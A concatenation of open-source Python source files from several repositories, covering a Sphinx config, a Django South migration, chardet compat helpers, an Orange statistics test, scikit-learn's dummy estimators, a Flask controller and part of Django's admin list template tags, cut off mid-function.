# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# If nonempty, this is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = ''
# Output file base name for HTML help builder.
htmlhelp_basename = 'Doctrine2ORMdoc'
# -- Options for LaTeX output --------------------------------------------------
# The paper size ('letter' or 'a4').
#latex_paper_size = 'letter'
# The font size ('10pt', '11pt' or '12pt').
#latex_font_size = '10pt'
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, documentclass [howto/manual]).
latex_documents = [
('index', 'Doctrine2ORM.tex', u'Doctrine 2 ORM Documentation',
u'Doctrine Project Team', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# Additional stuff for the LaTeX preamble.
#latex_preamble = ''
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_use_modindex = True
primary_domain = "dcorm"
def linkcode_resolve(domain, info):
if domain == 'dcorm':
return 'http://'
return None
|
hzlf/openbroadcast
|
refs/heads/master
|
website/shop/shop_simplevariations/migrations/0003_auto__add_textoption__del_field_cartitemtextoption_price__add_field_ca.py
|
3
|
# encoding: utf-8
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding model 'TextOption'
db.create_table('shop_simplevariations_textoption', (
('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('description', self.gf('django.db.models.fields.CharField')(max_length=255)),
('price', self.gf('django.db.models.fields.DecimalField')(default='0.00', max_digits=12, decimal_places=2)),
))
db.send_create_signal('shop_simplevariations', ['TextOption'])
# Deleting field 'CartItemTextOption.price'
db.delete_column('shop_simplevariations_cartitemtextoption', 'price')
# Adding field 'CartItemTextOption.text_option'
db.add_column('shop_simplevariations_cartitemtextoption', 'text_option', self.gf('django.db.models.fields.related.ForeignKey')(default=1, to=orm['shop_simplevariations.TextOption']), keep_default=False)
def backwards(self, orm):
# Deleting model 'TextOption'
db.delete_table('shop_simplevariations_textoption')
# Adding field 'CartItemTextOption.price'
db.add_column('shop_simplevariations_cartitemtextoption', 'price', self.gf('django.db.models.fields.DecimalField')(default='0.00', max_digits=12, decimal_places=2), keep_default=False)
# Deleting field 'CartItemTextOption.text_option'
db.delete_column('shop_simplevariations_cartitemtextoption', 'text_option_id')
models = {
'auth.group': {
'Meta': {'object_name': 'Group'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
'auth.permission': {
'Meta': {'ordering': "('content_type__app_label', 'content_type__model', 'codename')", 'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'shop.cart': {
'Meta': {'object_name': 'Cart'},
'date_created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'last_updated': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'user': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['auth.User']", 'unique': 'True', 'null': 'True', 'blank': 'True'})
},
'shop.cartitem': {
'Meta': {'object_name': 'CartItem'},
'cart': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'items'", 'to': "orm['shop.Cart']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'product': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['shop.Product']"}),
'quantity': ('django.db.models.fields.IntegerField', [], {})
},
'shop.product': {
'Meta': {'object_name': 'Product'},
'active': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'date_added': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'last_modified': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'polymorphic_ctype': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'polymorphic_shop.product_set'", 'null': 'True', 'to': "orm['contenttypes.ContentType']"}),
'slug': ('django.db.models.fields.SlugField', [], {'max_length': '50', 'db_index': 'True'}),
'unit_price': ('django.db.models.fields.DecimalField', [], {'default': "'0.00'", 'max_digits': '12', 'decimal_places': '2'})
},
'shop_simplevariations.cartitemoption': {
'Meta': {'object_name': 'CartItemOption'},
'cartitem': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['shop.CartItem']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'option': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['shop_simplevariations.Option']"})
},
'shop_simplevariations.cartitemtextoption': {
'Meta': {'object_name': 'CartItemTextOption'},
'cartitem': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['shop.CartItem']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'text': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'text_option': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['shop_simplevariations.TextOption']"})
},
'shop_simplevariations.option': {
'Meta': {'object_name': 'Option'},
'group': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['shop_simplevariations.OptionGroup']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'price': ('django.db.models.fields.DecimalField', [], {'default': "'0.00'", 'max_digits': '12', 'decimal_places': '2'})
},
'shop_simplevariations.optiongroup': {
'Meta': {'object_name': 'OptionGroup'},
'description': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'products': ('django.db.models.fields.related.ManyToManyField', [], {'blank': 'True', 'related_name': "'option_groups'", 'null': 'True', 'symmetrical': 'False', 'to': "orm['shop.Product']"}),
'slug': ('django.db.models.fields.SlugField', [], {'max_length': '50', 'db_index': 'True'})
},
'shop_simplevariations.textoption': {
'Meta': {'object_name': 'TextOption'},
'description': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'price': ('django.db.models.fields.DecimalField', [], {'default': "'0.00'", 'max_digits': '12', 'decimal_places': '2'})
}
}
complete_apps = ['shop_simplevariations']
|
pkats15/hdt_analyzer
|
refs/heads/master
|
django_test/django_venv/Lib/site-packages/pip/_vendor/requests/packages/chardet/compat.py
|
2942
|
######################## BEGIN LICENSE BLOCK ########################
# Contributor(s):
# Ian Cordasco - port to Python
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA
# 02110-1301 USA
######################### END LICENSE BLOCK #########################
import sys
if sys.version_info < (3, 0):
base_str = (str, unicode)
else:
base_str = (bytes, str)
def wrap_ord(a):
if sys.version_info < (3, 0) and isinstance(a, base_str):
return ord(a)
else:
return a
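# Illustrative usage (not part of the original file): on Python 2 iterating over a
# byte string yields one-character strings, which wrap_ord converts to ints; on
# Python 3 iterating over bytes already yields ints, which pass through unchanged.
# [wrap_ord(b) for b in b'AB']   # [65, 66] on both Python 2 and Python 3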
|
qPCR4vir/orange3
|
refs/heads/master
|
Orange/statistics/tests.py
|
18
|
import math
import numpy as np
import scipy.special
def wilcoxon_rank_sum(d1, d2):
# TODO Check this function!!!
N1, N2 = np.sum(d1[1, :]), np.sum(d2[1, :])
ni1, ni2 = d1.shape[1], d2.shape[1]
i1 = i2 = 0
R = 0
rank = 0
while i1 < ni1 and i2 < ni2:
if d1[0, i1] < d2[0, i2]:
R += (rank + (d1[1, i1] - 1) / 2) * d1[1, i1]
rank += d1[1, i1]
i1 += 1
elif d1[0, i1] == d2[0, i2]:
br = d1[1, i1] + d2[1, i2]
R += (rank + (br - 1) / 2) * d1[1, i1]
rank += br
i1 += 1
i2 += 1
else:
rank += d2[1, i2]
i2 += 1
if i1 < ni1:
s = np.sum(d1[1, i1:])
R += (rank + (s - 1) / 2) * s
U = R - N1 * (N1 + 1) / 2
m = N1 * N2 / 2
var = m * (N1 + N2 + 1) / 6
z = abs(U - m) / math.sqrt(var)
p = 2 * (1 - scipy.special.ndtr(z))
return z, p
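# Illustrative usage (a sketch inferred from the code above, not part of the
# original file): each distribution is a 2 x k array whose first row holds the
# sorted distinct values and whose second row holds their frequencies.
# d1 = np.array([[1.0, 2.0, 3.0], [4, 2, 1]])
# d2 = np.array([[1.5, 2.0, 4.0], [3, 2, 2]])
# z, p = wilcoxon_rank_sum(d1, d2)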
|
arabenjamin/scikit-learn
|
refs/heads/master
|
sklearn/dummy.py
|
208
|
# Author: Mathieu Blondel <[email protected]>
# Arnaud Joly <[email protected]>
# Maheshakya Wijewardena <[email protected]>
# License: BSD 3 clause
from __future__ import division
import warnings
import numpy as np
import scipy.sparse as sp
from .base import BaseEstimator, ClassifierMixin, RegressorMixin
from .utils import check_random_state
from .utils.validation import check_array
from .utils.validation import check_consistent_length
from .utils.random import random_choice_csc
from .utils.stats import _weighted_percentile
from .utils.multiclass import class_distribution
class DummyClassifier(BaseEstimator, ClassifierMixin):
"""
DummyClassifier is a classifier that makes predictions using simple rules.
This classifier is useful as a simple baseline to compare with other
(real) classifiers. Do not use it for real problems.
Read more in the :ref:`User Guide <dummy_estimators>`.
Parameters
----------
strategy : str
Strategy to use to generate predictions.
* "stratified": generates predictions by respecting the training
set's class distribution.
* "most_frequent": always predicts the most frequent label in the
training set.
* "prior": always predicts the class that maximizes the class prior
(like "most_frequent") and ``predict_proba`` returns the class prior.
* "uniform": generates predictions uniformly at random.
* "constant": always predicts a constant label that is provided by
the user. This is useful for metrics that evaluate a non-majority
class
random_state : int seed, RandomState instance, or None (default)
The seed of the pseudo random number generator to use.
constant : int or str or array of shape = [n_outputs]
The explicit constant as predicted by the "constant" strategy. This
parameter is useful only for the "constant" strategy.
Attributes
----------
classes_ : array or list of array of shape = [n_classes]
Class labels for each output.
n_classes_ : array or list of array of shape = [n_classes]
Number of labels for each output.
class_prior_ : array or list of array of shape = [n_classes]
Probability of each class for each output.
n_outputs_ : int,
Number of outputs.
output_2d_ : bool,
True if the output at fit is 2d, else false.
sparse_output_ : bool,
True if the array returned from predict is to be in sparse CSC format.
Is automatically set to True if the input y is passed in sparse format.
"""
def __init__(self, strategy="stratified", random_state=None,
constant=None):
self.strategy = strategy
self.random_state = random_state
self.constant = constant
def fit(self, X, y, sample_weight=None):
"""Fit the random classifier.
Parameters
----------
X : {array-like, sparse matrix}, shape = [n_samples, n_features]
Training vectors, where n_samples is the number of samples
and n_features is the number of features.
y : array-like, shape = [n_samples] or [n_samples, n_outputs]
Target values.
sample_weight : array-like of shape = [n_samples], optional
Sample weights.
Returns
-------
self : object
Returns self.
"""
if self.strategy not in ("most_frequent", "stratified", "uniform",
"constant", "prior"):
raise ValueError("Unknown strategy type.")
if self.strategy == "uniform" and sp.issparse(y):
y = y.toarray()
warnings.warn('A local copy of the target data has been converted '
'to a numpy array. Predicting on sparse target data '
'with the uniform strategy would not save memory '
'and would be slower.',
UserWarning)
self.sparse_output_ = sp.issparse(y)
if not self.sparse_output_:
y = np.atleast_1d(y)
self.output_2d_ = y.ndim == 2
if y.ndim == 1:
y = np.reshape(y, (-1, 1))
self.n_outputs_ = y.shape[1]
if self.strategy == "constant":
if self.constant is None:
raise ValueError("Constant target value has to be specified "
"when the constant strategy is used.")
else:
constant = np.reshape(np.atleast_1d(self.constant), (-1, 1))
if constant.shape[0] != self.n_outputs_:
raise ValueError("Constant target value should have "
"shape (%d, 1)." % self.n_outputs_)
(self.classes_,
self.n_classes_,
self.class_prior_) = class_distribution(y, sample_weight)
if (self.strategy == "constant" and
any(constant[k] not in self.classes_[k]
for k in range(self.n_outputs_))):
# Checking in case of constant strategy if the constant
# provided by the user is in y.
raise ValueError("The constant target value must be "
"present in training data")
if self.n_outputs_ == 1 and not self.output_2d_:
self.n_classes_ = self.n_classes_[0]
self.classes_ = self.classes_[0]
self.class_prior_ = self.class_prior_[0]
return self
def predict(self, X):
"""Perform classification on test vectors X.
Parameters
----------
X : {array-like, sparse matrix}, shape = [n_samples, n_features]
Input vectors, where n_samples is the number of samples
and n_features is the number of features.
Returns
-------
y : array, shape = [n_samples] or [n_samples, n_outputs]
Predicted target values for X.
"""
if not hasattr(self, "classes_"):
raise ValueError("DummyClassifier not fitted.")
X = check_array(X, accept_sparse=['csr', 'csc', 'coo'])
# numpy random_state expects Python int and not long as size argument
# under Windows
n_samples = int(X.shape[0])
rs = check_random_state(self.random_state)
n_classes_ = self.n_classes_
classes_ = self.classes_
class_prior_ = self.class_prior_
constant = self.constant
if self.n_outputs_ == 1:
# Get same type even for self.n_outputs_ == 1
n_classes_ = [n_classes_]
classes_ = [classes_]
class_prior_ = [class_prior_]
constant = [constant]
# Compute probability only once
if self.strategy == "stratified":
proba = self.predict_proba(X)
if self.n_outputs_ == 1:
proba = [proba]
if self.sparse_output_:
class_prob = None
if self.strategy in ("most_frequent", "prior"):
classes_ = [np.array([cp.argmax()]) for cp in class_prior_]
elif self.strategy == "stratified":
class_prob = class_prior_
elif self.strategy == "uniform":
raise ValueError("Sparse target prediction is not "
"supported with the uniform strategy")
elif self.strategy == "constant":
classes_ = [np.array([c]) for c in constant]
y = random_choice_csc(n_samples, classes_, class_prob,
self.random_state)
else:
if self.strategy in ("most_frequent", "prior"):
y = np.tile([classes_[k][class_prior_[k].argmax()] for
k in range(self.n_outputs_)], [n_samples, 1])
elif self.strategy == "stratified":
y = np.vstack(classes_[k][proba[k].argmax(axis=1)] for
k in range(self.n_outputs_)).T
elif self.strategy == "uniform":
ret = [classes_[k][rs.randint(n_classes_[k], size=n_samples)]
for k in range(self.n_outputs_)]
y = np.vstack(ret).T
elif self.strategy == "constant":
y = np.tile(self.constant, (n_samples, 1))
if self.n_outputs_ == 1 and not self.output_2d_:
y = np.ravel(y)
return y
def predict_proba(self, X):
"""
Return probability estimates for the test vectors X.
Parameters
----------
X : {array-like, sparse matrix}, shape = [n_samples, n_features]
Input vectors, where n_samples is the number of samples
and n_features is the number of features.
Returns
-------
P : array-like or list of array-like of shape = [n_samples, n_classes]
Returns the probability of the sample for each class in
the model, where classes are ordered arithmetically, for each
output.
"""
if not hasattr(self, "classes_"):
raise ValueError("DummyClassifier not fitted.")
X = check_array(X, accept_sparse=['csr', 'csc', 'coo'])
# numpy random_state expects Python int and not long as size argument
# under Windows
n_samples = int(X.shape[0])
rs = check_random_state(self.random_state)
n_classes_ = self.n_classes_
classes_ = self.classes_
class_prior_ = self.class_prior_
constant = self.constant
if self.n_outputs_ == 1 and not self.output_2d_:
# Get same type even for self.n_outputs_ == 1
n_classes_ = [n_classes_]
classes_ = [classes_]
class_prior_ = [class_prior_]
constant = [constant]
P = []
for k in range(self.n_outputs_):
if self.strategy == "most_frequent":
ind = np.ones(n_samples, dtype=int) * class_prior_[k].argmax()
out = np.zeros((n_samples, n_classes_[k]), dtype=np.float64)
out[:, ind] = 1.0
elif self.strategy == "prior":
out = np.ones((n_samples, 1)) * class_prior_[k]
elif self.strategy == "stratified":
out = rs.multinomial(1, class_prior_[k], size=n_samples)
elif self.strategy == "uniform":
out = np.ones((n_samples, n_classes_[k]), dtype=np.float64)
out /= n_classes_[k]
elif self.strategy == "constant":
ind = np.where(classes_[k] == constant[k])
out = np.zeros((n_samples, n_classes_[k]), dtype=np.float64)
out[:, ind] = 1.0
P.append(out)
if self.n_outputs_ == 1 and not self.output_2d_:
P = P[0]
return P
def predict_log_proba(self, X):
"""
Return log probability estimates for the test vectors X.
Parameters
----------
X : {array-like, sparse matrix}, shape = [n_samples, n_features]
Input vectors, where n_samples is the number of samples
and n_features is the number of features.
Returns
-------
P : array-like or list of array-like of shape = [n_samples, n_classes]
Returns the log probability of the sample for each class in
the model, where classes are ordered arithmetically for each
output.
"""
proba = self.predict_proba(X)
if self.n_outputs_ == 1:
return np.log(proba)
else:
return [np.log(p) for p in proba]
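# Illustrative usage (not part of the original file): a baseline classifier that
# always predicts the majority class of the training labels; the toy data below is
# made up.
# >>> import numpy as np
# >>> clf = DummyClassifier(strategy="most_frequent").fit(np.zeros((4, 1)), [0, 1, 1, 1])
# >>> clf.predict(np.zeros((2, 1)))
# array([1, 1])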
class DummyRegressor(BaseEstimator, RegressorMixin):
"""
DummyRegressor is a regressor that makes predictions using
simple rules.
This regressor is useful as a simple baseline to compare with other
(real) regressors. Do not use it for real problems.
Read more in the :ref:`User Guide <dummy_estimators>`.
Parameters
----------
strategy : str
Strategy to use to generate predictions.
* "mean": always predicts the mean of the training set
* "median": always predicts the median of the training set
* "quantile": always predicts a specified quantile of the training set,
provided with the quantile parameter.
* "constant": always predicts a constant value that is provided by
the user.
constant : int or float or array of shape = [n_outputs]
The explicit constant as predicted by the "constant" strategy. This
parameter is useful only for the "constant" strategy.
quantile : float in [0.0, 1.0]
The quantile to predict using the "quantile" strategy. A quantile of
0.5 corresponds to the median, while 0.0 to the minimum and 1.0 to the
maximum.
Attributes
----------
constant_ : float or array of shape [n_outputs]
Mean or median or quantile of the training targets or constant value
given by the user.
n_outputs_ : int,
Number of outputs.
output_2d_ : bool,
True if the output at fit is 2d, else false.
"""
def __init__(self, strategy="mean", constant=None, quantile=None):
self.strategy = strategy
self.constant = constant
self.quantile = quantile
def fit(self, X, y, sample_weight=None):
"""Fit the random regressor.
Parameters
----------
X : {array-like, sparse matrix}, shape = [n_samples, n_features]
Training vectors, where n_samples is the number of samples
and n_features is the number of features.
y : array-like, shape = [n_samples] or [n_samples, n_outputs]
Target values.
sample_weight : array-like of shape = [n_samples], optional
Sample weights.
Returns
-------
self : object
Returns self.
"""
if self.strategy not in ("mean", "median", "quantile", "constant"):
raise ValueError("Unknown strategy type: %s, expected "
"'mean', 'median', 'quantile' or 'constant'"
% self.strategy)
y = check_array(y, ensure_2d=False)
if len(y) == 0:
raise ValueError("y must not be empty.")
self.output_2d_ = y.ndim == 2
if y.ndim == 1:
y = np.reshape(y, (-1, 1))
self.n_outputs_ = y.shape[1]
check_consistent_length(X, y, sample_weight)
if self.strategy == "mean":
self.constant_ = np.average(y, axis=0, weights=sample_weight)
elif self.strategy == "median":
if sample_weight is None:
self.constant_ = np.median(y, axis=0)
else:
self.constant_ = [_weighted_percentile(y[:, k], sample_weight,
percentile=50.)
for k in range(self.n_outputs_)]
elif self.strategy == "quantile":
if self.quantile is None or not np.isscalar(self.quantile):
raise ValueError("Quantile must be a scalar in the range "
"[0.0, 1.0], but got %s." % self.quantile)
percentile = self.quantile * 100.0
if sample_weight is None:
self.constant_ = np.percentile(y, axis=0, q=percentile)
else:
self.constant_ = [_weighted_percentile(y[:, k], sample_weight,
percentile=percentile)
for k in range(self.n_outputs_)]
elif self.strategy == "constant":
if self.constant is None:
raise TypeError("Constant target value has to be specified "
"when the constant strategy is used.")
self.constant = check_array(self.constant,
accept_sparse=['csr', 'csc', 'coo'],
ensure_2d=False, ensure_min_samples=0)
if self.output_2d_ and self.constant.shape[0] != y.shape[1]:
raise ValueError(
"Constant target value should have "
"shape (%d, 1)." % y.shape[1])
self.constant_ = self.constant
self.constant_ = np.reshape(self.constant_, (1, -1))
return self
def predict(self, X):
"""
Perform regression on test vectors X.
Parameters
----------
X : {array-like, sparse matrix}, shape = [n_samples, n_features]
Input vectors, where n_samples is the number of samples
and n_features is the number of features.
Returns
-------
y : array, shape = [n_samples] or [n_samples, n_outputs]
Predicted target values for X.
"""
if not hasattr(self, "constant_"):
raise ValueError("DummyRegressor not fitted.")
X = check_array(X, accept_sparse=['csr', 'csc', 'coo'])
n_samples = X.shape[0]
y = np.ones((n_samples, 1)) * self.constant_
if self.n_outputs_ == 1 and not self.output_2d_:
y = np.ravel(y)
return y
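# Illustrative usage (not part of the original file): a baseline regressor that
# always predicts the mean of the training targets; the toy data below is made up.
# >>> import numpy as np
# >>> reg = DummyRegressor(strategy="mean").fit(np.zeros((4, 1)), [1.0, 2.0, 3.0, 4.0])
# >>> reg.predict(np.zeros((2, 1)))
# array([2.5, 2.5])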
|
ElBell/VTDairyDB
|
refs/heads/master
|
controllers/__init__.py
|
1
|
__author__ = 'Eleonor Bart'
from main import app
from flask import session, g, send_from_directory, request, jsonify, render_template
from flask import url_for, redirect
@app.route('/')
def homepage():
return render_template('homepage.html')
@app.route("/site-map", methods=['GET', 'POST'])
def site_map():
import urllib
output = []
for rule in app.url_map.iter_rules():
options = {}
for arg in rule.arguments:
options[arg] = "[{0}]".format(arg)
methods = ','.join(rule.methods)
try:
url = url_for(rule.endpoint, **options)
except:
url = "Unknown error"
line = urllib.unquote("<td>{:50s}</td><td>{:20s}</td><td>{}</td>".format(rule.endpoint, methods, url))
output.append(line)
return "<table><tr>{}</tr></table>".format("</tr><tr>".join(sorted(output)))
#
from admin import admin
import security
import cow
import uploads
import life_data
import growth_data
import filter
import add_user
|
mammique/django
|
refs/heads/tp_alpha
|
django/contrib/admin/templatetags/admin_list.py
|
103
|
from __future__ import unicode_literals
import datetime
from django.contrib.admin.util import (lookup_field, display_for_field,
display_for_value, label_for_field)
from django.contrib.admin.views.main import (ALL_VAR, EMPTY_CHANGELIST_VALUE,
ORDER_VAR, PAGE_VAR, SEARCH_VAR)
from django.contrib.admin.templatetags.admin_static import static
from django.core.exceptions import ObjectDoesNotExist
from django.db import models
from django.utils import formats
from django.utils.html import format_html
from django.utils.safestring import mark_safe
from django.utils import six
from django.utils.text import capfirst
from django.utils.translation import ugettext as _
from django.utils.encoding import smart_text, force_text
from django.template import Library
from django.template.loader import get_template
from django.template.context import Context
register = Library()
DOT = '.'
@register.simple_tag
def paginator_number(cl,i):
"""
Generates an individual page index link in a paginated list.
"""
if i == DOT:
return '... '
elif i == cl.page_num:
return format_html('<span class="this-page">{0}</span> ', i+1)
else:
return format_html('<a href="{0}"{1}>{2}</a> ',
cl.get_query_string({PAGE_VAR: i}),
mark_safe(' class="end"' if i == cl.paginator.num_pages-1 else ''),
i+1)
@register.inclusion_tag('admin/pagination.html')
def pagination(cl):
"""
Generates the series of links to the pages in a paginated list.
"""
paginator, page_num = cl.paginator, cl.page_num
pagination_required = (not cl.show_all or not cl.can_show_all) and cl.multi_page
if not pagination_required:
page_range = []
else:
ON_EACH_SIDE = 3
ON_ENDS = 2
# If there are 10 or fewer pages, display links to every page.
# Otherwise, do some fancy pagination.
if paginator.num_pages <= 10:
page_range = range(paginator.num_pages)
else:
# Insert "smart" pagination links, so that there are always ON_ENDS
# links at either end of the list of pages, and there are always
# ON_EACH_SIDE links at either end of the "current page" link.
page_range = []
if page_num > (ON_EACH_SIDE + ON_ENDS):
page_range.extend(range(0, ON_EACH_SIDE - 1))
page_range.append(DOT)
page_range.extend(range(page_num - ON_EACH_SIDE, page_num + 1))
else:
page_range.extend(range(0, page_num + 1))
if page_num < (paginator.num_pages - ON_EACH_SIDE - ON_ENDS - 1):
page_range.extend(range(page_num + 1, page_num + ON_EACH_SIDE + 1))
page_range.append(DOT)
page_range.extend(range(paginator.num_pages - ON_ENDS, paginator.num_pages))
else:
page_range.extend(range(page_num + 1, paginator.num_pages))
need_show_all_link = cl.can_show_all and not cl.show_all and cl.multi_page
return {
'cl': cl,
'pagination_required': pagination_required,
'show_all_url': need_show_all_link and cl.get_query_string({ALL_VAR: ''}),
'page_range': page_range,
'ALL_VAR': ALL_VAR,
'1': 1,
}
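# Illustrative note (not part of the original file): with paginator.num_pages == 50
# and cl.page_num == 25, the logic above yields
# page_range == [0, 1, '.', 22, 23, 24, 25, 26, 27, 28, '.', 48, 49]
# i.e. a couple of pages at each end plus a window around the current page,
# separated by DOT entries.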
def result_headers(cl):
"""
Generates the list column headers.
"""
ordering_field_columns = cl.get_ordering_field_columns()
for i, field_name in enumerate(cl.list_display):
text, attr = label_for_field(field_name, cl.model,
model_admin = cl.model_admin,
return_attr = True
)
if attr:
# Potentially not sortable
# if the field is the action checkbox: no sorting and special class
if field_name == 'action_checkbox':
yield {
"text": text,
"class_attrib": mark_safe(' class="action-checkbox-column"'),
"sortable": False,
}
continue
admin_order_field = getattr(attr, "admin_order_field", None)
if not admin_order_field:
# Not sortable
yield {
"text": text,
"sortable": False,
}
continue
# OK, it is sortable if we got this far
th_classes = ['sortable']
order_type = ''
new_order_type = 'asc'
sort_priority = 0
sorted = False
# Is it currently being sorted on?
if i in ordering_field_columns:
sorted = True
order_type = ordering_field_columns.get(i).lower()
sort_priority = list(ordering_field_columns).index(i) + 1
th_classes.append('sorted %sending' % order_type)
new_order_type = {'asc': 'desc', 'desc': 'asc'}[order_type]
# build new ordering param
o_list_primary = [] # URL for making this field the primary sort
o_list_remove = [] # URL for removing this field from sort
o_list_toggle = [] # URL for toggling order type for this field
make_qs_param = lambda t, n: ('-' if t == 'desc' else '') + str(n)
for j, ot in ordering_field_columns.items():
if j == i: # Same column
param = make_qs_param(new_order_type, j)
# We want clicking on this header to bring the ordering to the
# front
o_list_primary.insert(0, param)
o_list_toggle.append(param)
# o_list_remove - omit
else:
param = make_qs_param(ot, j)
o_list_primary.append(param)
o_list_toggle.append(param)
o_list_remove.append(param)
if i not in ordering_field_columns:
o_list_primary.insert(0, make_qs_param(new_order_type, i))
yield {
"text": text,
"sortable": True,
"sorted": sorted,
"ascending": order_type == "asc",
"sort_priority": sort_priority,
"url_primary": cl.get_query_string({ORDER_VAR: '.'.join(o_list_primary)}),
"url_remove": cl.get_query_string({ORDER_VAR: '.'.join(o_list_remove)}),
"url_toggle": cl.get_query_string({ORDER_VAR: '.'.join(o_list_toggle)}),
"class_attrib": format_html(' class="{0}"', ' '.join(th_classes))
if th_classes else '',
}
def _boolean_icon(field_val):
icon_url = static('admin/img/icon-%s.gif' %
{True: 'yes', False: 'no', None: 'unknown'}[field_val])
return format_html('<img src="{0}" alt="{1}" />', icon_url, field_val)
def items_for_result(cl, result, form):
"""
Generates the actual list of data.
"""
first = True
pk = cl.lookup_opts.pk.attname
for field_name in cl.list_display:
row_class = ''
try:
f, attr, value = lookup_field(field_name, result, cl.model_admin)
except ObjectDoesNotExist:
result_repr = EMPTY_CHANGELIST_VALUE
else:
if f is None:
if field_name == 'action_checkbox':
row_class = mark_safe(' class="action-checkbox"')
allow_tags = getattr(attr, 'allow_tags', False)
boolean = getattr(attr, 'boolean', False)
if boolean:
allow_tags = True
result_repr = display_for_value(value, boolean)
# Strip HTML tags in the resulting text, except if the
# function has an "allow_tags" attribute set to True.
if allow_tags:
result_repr = mark_safe(result_repr)
if isinstance(value, (datetime.date, datetime.time)):
row_class = mark_safe(' class="nowrap"')
else:
if isinstance(f.rel, models.ManyToOneRel):
field_val = getattr(result, f.name)
if field_val is None:
result_repr = EMPTY_CHANGELIST_VALUE
else:
result_repr = field_val
else:
result_repr = display_for_field(value, f)
if isinstance(f, (models.DateField, models.TimeField, models.ForeignKey)):
row_class = mark_safe(' class="nowrap"')
if force_text(result_repr) == '':
result_repr = mark_safe(' ')
